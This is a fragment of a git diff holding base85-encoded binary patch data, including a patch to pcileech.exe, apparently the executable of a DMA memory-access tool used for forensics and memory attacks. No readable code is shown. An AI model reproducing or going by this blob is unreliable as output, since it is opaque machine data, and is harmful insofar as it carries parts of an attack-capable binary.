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

diff --git a/pcileech_files/pcileech.exe b/pcileech_files/pcileech.exe
index 99b74213a280e9b9793c0b545ceb0810be2662da..85e7078a46814878197eeeca3bc8c0e5cf4c0d0b 100644
GIT binary patch
delta 133145
zcmbrnd3;kv_dlN8+t30Hw=AKBLL1r?%3df-OIaG4z%5Oo%DxxGvdfl2S<{jh2$u*r
zpok!-AczYHvJ_ET3bgEqfViWm+*(vnA7oMTd!M;U!RPsY{`%=F+?g|H&YU?jbLPyM
zrTJgg%m2!>ru$1_oq~earlz{OhrY2aZ~D0_f#2CX-LEV`{Op~cSN`PRURUPgo0fR~
zvWtH!E>Ga!Q<taUyZwb4S7zaxH~s9DAbfvIJau^*zCR~+yfUB1FI=YY)03Z>L}lpy
z{a<TcmR+Ztuq;?7@7q2ikak-aqpK~{(djyhI$b}3gA3QPj`|k*i)@6xXWOq547v#f
z-eb^R*W;UQ&`nF=c-lWD2HngWI$g=1LAoYun?*Lfj=;Jn(sfy)E>B$BtT77{Lb~cY
zpqwxyQ+Yv8qUm&I5N|ho!Z_zRoo>`El!ctSU-9iCvH?O=$5ew(7m6$ve4qF)6@|B(
zsb%AwfkRzKAS4*r79pzERz#^{;|;7FQPhJ+Cm7goLL-TI*P#x&5PWkCEL^Nyn-F46
z9VokRnPvC<5S^@i?rb9~HD!14&R`%pqve9qEQEZfUwes27G>p(>^^QDDf_k(1`o5R
zE;JZ5loL_zD_>~&w^IIGV`7P{jItyU-q^BgVk<eZVC7R;x!_wvsInp{*Q(Q}AYCb|
z&dJs`YxvU0Tl!iN`oz27QF-J(l#0se=LM^c>gsgLJvJ_=zH4hY3W7;3Rm`mgZq>uh
z{sj%vpf<Fta<9nev{0pz_vC|zRB8Q5&mITorgk+iyLwW^Q3s`5R-Be3ttw~z|H+<F
zmJr!9%@QWRBn=d5_6K|E%6-Vds@#^9pCQRLToOTvB~@LkiH_hzMTc_1rks?OD`3>O
zh7e`tamhV;ifnb8hA-R;a+RUD)PaMC43!IRO{z&~hPLetIyv#U>?yQlamXFn;{bbT
zJrwI1WJ$Fu_Z=P^3BQ=Cr;`f*!oPA#aS~)FEx&<CflrqzAp9A^iI-&WD$7N5LhB*I
zSF2X)b%|dpRW`--DI_(~0V$+@OkJAGV~tHYCwtfN9CqbchBwF~dqYovl1>&sK{TSD
zXVBR!*&`_B*4D>TPD*`G`c8NXL$9F-n|L)H7~nqiHbqlDo4tpNH}OkZsT1JX>6e%b
z9WcCysB<U{9bShe)ux<~y@M=SvU1+)dx4mxOo6WYpYEbAd733vT31%Nk}6hGSwu{^
zi}Oef&fo49TJ}I>dS`Otmp0`Bs8BPS)lH9lzM_)cCJqHs;|W)Ig6vYxtNA?9+2cd7
ztE=i#U0Oa$la(4k=h=8;p7*VxqQKM>oq8+~sZ+1g+AHy_+GC+!Cl?&21|2(Q^vE(a
z@u4h;SN&iC5?WtJEB9+dt?c5>oXRC%Xjy@8x^m5-Y_jAd=uke9shO<>_o;21W{0A;
zD)}k~x<e^LO1y*DZV&jbe4YfM)O2`l=pV&|uM`kwx^nt4<}yMeIUhD7Bt@sX@J}Iv
z1b!tSA1O>Pg{6ndUJsAeP0N?UtXrkJ8EXLEBh^jYig*d)dl0{fcnRXy5x<D|ZNw>j
zTXz4f&wZC9!m9>}w55s{948?_9Qe<MK5cfmz#IC?AdE7^L-;^&-<qTpS`LAk#4qj2
zC%i7Ul#8fpYNk@*0P--a)cY8EW}NP}&(}kj0Ji&9Bwn&A$2_Ze#=q_)-c46d6<q?d
zjYfasCGoZgDnY%w99`d6bXO{5Xl}IsI~Ee3x4$n?=3Ox2fM|3n_j7A04vS6syy#S}
zK+UqwvIe*|<%|Q!TM<lG1ot7*D>`SqjN}a*c3L^<5KBmRm}T*z>O?`xHB>aUGMLJQ
zR0vP`RTj^=<Z_$EjF^t<k8b}7+RGuHP;Wn^9_#F&N3HFNrzjKg3B@X2wV|_#{=!Pt
zP<6sFBml4SHKGH|5`6EL>ZPJ12oyY|&XAi%30o0|HW1H&g!;=ez0MWj+FA_OcxEa_
zE;vS+WbukUu|zfa=~vkU^`_pAQ3^>A+X-NpsINiJQZ<OWn+ySQLWr2v1{h()pm>cM
zQTEH61nxo>Upb`g5O1d}vdGd>58;+U7f<3N#|FAPfdoFN$YHkD=L2;Q$RxeAGE^O3
z3K>Ae)fu@OPlaN&4zdom4zbcShN2Ch$J4mOu(Od$b$!5PVpS@s6JmhfDg7n1IF$-i
zzLU{o;xiRh`A7CPm<|{TL@xb4$Y&}{BAs<lE-H}<V<0(V&$G$0f^fV|)S_RU;~mPk
zvUi|aRu);znWRHL<r<cHR!&Y})VVS}b)hbkWKZwwncnmet8!fSJ{@muUBb0$y8BqX
zr*}z)Hz?jFo&?ghba$0L_cSTgc;%n;ClqR@YQ6PIR}mev2I*7ix)bTjXXy&`7AaH8
z5KyLjfmY=D#hLXHHFY&dvQnSarg$ZJYG`g9bUnM*s#j~2Ks7eeItg`&yGKz`B?AIG
zk$6enS%|^yE{m7lzv**7PRG=5nhxruY-Q*&l1l0IP#MjfBtsXpoJ;7(Q>|mIt;SeK
zTSuX#xlYj9j9Lm)+x!R}<~e6AU?z;M?2^x})od=j`rw6H(Zc3?tXZw5Y{_3Cj{lyM
z`FxoB?>Tu&7jEJFdrsEomdA5)CJeME=46^*BWPMCUX)6!a)-~q4=~rPpz)qt3oTBZ
zf%UsK%S=7ZC&QfmXx=$5WB%lt`GAklI}nr2lFbu7)8-xJoVt;xNrk_F8lQS-P=SW*
z@{_G@sh2ww|8^*z^PG^Ze1;NyYlsn9$%JyLMx6`PqA#7zi6ucQd;zq*FY3$~^{0HM
z$wUYBf||L8o|`LaHr%j4J(O~r_j#YhuGebg`sps$Kj^*=OLoCcpG0%cNsNOOHKRbU
zLvDk2n7&G&SsjYYXZod6z_P2R$D8vkZ%L_We?BHDnrcY^Fsz)Guz+Q01v_Ni{0`x6
z;KHppSYr*MuQtr8>o@@=$x1M3LFFp9Gbz)*?M#{DAg?A=bSE-X*~Z#Y4Vok)JE9{i
z`_-q>YD`HM+1c7jae37VkLvM+-5BH=<}Vtc4lrAWwvTsKWA4%t7y#<46jsitePF1A
zY~Li2<%h;M=!B7=Q5m5jXLJ?Wk<c`8FusB@K5l$9!Znz@$myvDlxu*Cw0JN!7w5$o
